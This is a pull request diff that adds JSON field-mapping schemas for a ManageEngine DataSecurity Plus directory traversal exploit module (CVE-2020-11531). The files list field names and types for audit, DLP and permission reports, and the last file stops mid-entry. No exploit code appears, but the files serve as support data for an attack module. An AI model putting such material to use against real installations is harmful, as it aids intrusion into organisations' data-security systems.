### PR TITLE
Add ManageEngine DataSecurity Plus directory traversal exploit module and docs (CVE-2020-11531)

### DIFF
--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DLPFilePolicyIncidents_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DLPFilePolicyIncidents_V1.json
@@ -1,0 +1,23 @@
+{"mappings": {
+  "range_field": "RECORD_ID",
+  "unique_fields": ["RECORD_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"RECORD_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"MAIN_INCIDENT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"RULE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"RULE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DLPIncidents_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DLPIncidents_V1.json
@@ -1,0 +1,44 @@
+{"mappings": {
+  "time_field": "TIME_GENERATED",
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["INCIDENT_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"INCIDENT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_TYPE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCATION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SEREVER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"POLICY_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"POLICY_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"NO_OF_OCCURRENCES": {
+      "docs_val": true,
+      "type": "long"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DLPViolationRecords_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DLPViolationRecords_V1.json
@@ -1,0 +1,32 @@
+{"mappings": {
+  "time_field": "INCIDENT_ID",
+  "range_field": "INCIDENT_ID",
+  "unique_fields": ["VIOLATION_RECORD_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"VIOLATION_RECORD_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"INCIDENT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"RULE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"RULE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"VIOLATION_TEXT": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"DISPLAY_TEXT": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEffectivePermissionsReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEffectivePermissionsReport_V1.json
@@ -1,0 +1,51 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SHARE_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"EFFECTIVE_PERMISSIONS": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEmailAuditAttachments_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEmailAuditAttachments_V1.json
@@ -1,0 +1,39 @@
+{"mappings": {
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ATTACHMENT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ATTACHMENT_FILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"ATTACHMENT_FILE_TYPE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"ATTACHMENT_CLASSIFICATION_VALUE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ATTACHMENT_CLASSIFICATION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"ATTACHMENT_FILE_SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEmailAuditReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEmailAuditReport_V1.json
@@ -1,0 +1,95 @@
+{"mappings": {
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"COMPLETION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ENDPOINT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ENDPOINT_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"ATTACHMENT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ACCESS_TYPE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ACCESS_TYPE_MESSAGE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PROCESS_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_FROM": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_TO": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_BCC": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_CC": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_SUBJECT": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_SENT_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"MAIL_CLASSFICATION_VALUE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"MAIL_CLASSFICATION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PROFILE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"PROFILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEndpointAuditReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEndpointAuditReport_V1.json
@@ -1,0 +1,211 @@
+{"mappings": {
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"COMPLETION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ENDPOINT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ENDPOINT_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"USER_SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PROCESS_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_ACCESS_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_WRITE_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CREATION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_ATTRIBUTES": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"UNC_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCATION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MESSAGE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"NEW_FILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IMAGE_FILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OLD_SHARE_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"NEW_SHARE_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SHARE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"IS_SUCCESS_EVENT": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_DIRECTORY": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_TRANSACTION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"ACTION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ACCESS_MASK": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"THREAD_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CALLBACK_MAJOR_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CALLBACK_MINOR_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"PROFILE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"USER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"OLD_SACL": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"NEW_SACL": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"DIFF_SACL": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CLIENT_IP": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"CLIENT_HOST": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OWNER_INFO": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OTHERINFO_1": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OTHERINFO_2": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_SENSITIVE_DATA": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILETYPE_EXTENSION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILETYPE_CATEGORY": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"ACCESS_FROM": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"EVENT_GENERATED_BY": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LOGIN_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LOGIN_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OWNER_SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_USB_EVENT": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_NETWORK_COPY": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEndpointClassificationReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEndpointClassificationReport_V1.json
@@ -1,0 +1,103 @@
+{"mappings": {
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"COMPLETION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ENDPOINT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ENDPOINT_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"CLASSIFICATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CLASSIFICATION_VALUE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"CLASSIFICATION_MSG": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCAL_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LAST_ACCESS_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_WRITE_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CREATION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_ATTRIBUTES": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_OWNER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OWNER_SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILETYPE_EXTENSION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_HIDDEN": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MEDIA_FILE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILETYPE_EXTENSION_CATEGORY": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEndpointIncidentReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPEndpointIncidentReport_V1.json
@@ -1,0 +1,191 @@
+{"mappings": {
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["INCIDENT_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"INCIDENT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MODULE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"INCIDENT_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"COMPLETION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"MESSAGE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCATION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"ENDPOINT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"INCIDENT_STATUS": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"VIOLATED_POLICY": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"DOMAIN_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ENDPOINT_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_ACCESS_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_WRITE_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CREATION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"NEW_FILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IMAGE_FILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILETYPE_EXTENSION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_USB_EVENT": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"NOTIFY_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_FROM": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_TO": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_BCC": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_CC": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_SUBJECT": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MAIL_SENT_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"MAIL_CLASSFICATION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PRINTER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILENAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PORT_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"MACHINE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"PRINTER_USERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"TOTAL_PAGES": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CLIENTIPLIST": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"URL": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"CLASSIFICATION_VALUE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"INCIDENT_PROFILE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"INCIDENT_PROFILE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"INCIDENT_SEVERITY": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPFileAnalysisAlerts_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPFileAnalysisAlerts_V1.json
@@ -1,0 +1,99 @@
+{"mappings": {
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["INCIDENT_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"INCIDENT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"VIOLATED_PROFILE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"DRIVE_LETTER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SECURITY_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_ATTRIBUTES": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LAST_ACCESS_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"LAST_WRITE_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_SIZE": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CREATION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"YEAR_CREATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCAL_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILETYPE_EXTENSION": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_HIDDEN": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_DIRECTORY": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IS_STALE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"NON_BUSINESS_FILE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILETYPE_EXTENSION_CATEGORY": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPJunctionPointsReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPJunctionPointsReport_V1.json
@@ -1,0 +1,35 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"TARGET_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPNetFilesReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPNetFilesReport_V1.json
@@ -1,0 +1,39 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CLIENT_HOST": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPNetSessionsReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPNetSessionsReport_V1.json
@@ -1,0 +1,47 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CLIENT_HOST": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OPEN_FILES_COUNT": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"CONNECTED_TIME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"IDLE_TIME": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPOwnerlessFilesReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPOwnerlessFilesReport_V1.json
@@ -1,0 +1,43 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SHARE_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"FILE_OWNER": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"OWNER_SID": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPPrivilegedUsersReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPPrivilegedUsersReport_V1.json
@@ -1,0 +1,51 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"FILE_FOLDER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SHARE_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SID": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SECURITY_PERMISSIONS": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPShareReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DSPShareReport_V1.json
@@ -1,0 +1,47 @@
+{"mappings": {
+  "range_field": "UNIQUE_ID",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVER_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SERVERNAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"REPORT_GENERATION_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SHARE_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SHARE_TYPE": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SHARE_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"LOCAL_PATH": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"SHARE_PERMISSIONS": {
+      "docs_val": true,
+      "type": "text"
+    }}
+  ]
+}}

--- a/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DspEndpointPrinterAuditReport_V1.json
+++ b/data/exploits/manageengine_xnode/CVE-2020-11531/DataSecurityPlus/DspEndpointPrinterAuditReport_V1.json
@@ -1,0 +1,91 @@
+{"mappings": {
+  "range_field": "TIME_GENERATED",
+  "unique_fields": ["UNIQUE_ID"],
+  "default_analyzer": "KEYWORD_LOWERCASE",
+  "field_list": [
+    {"UNIQUE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"TIME_GENERATED": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"COMPLETION_TIME": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"SOURCE_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ENDPOINT_ID": {
+      "docs_val": true,
+      "type": "long"
+    }},
+    {"ENDPOINT_NAME": {
+      "docs_val": true,
+      "type": "text"
+    }},
+    {"USER_SID": {
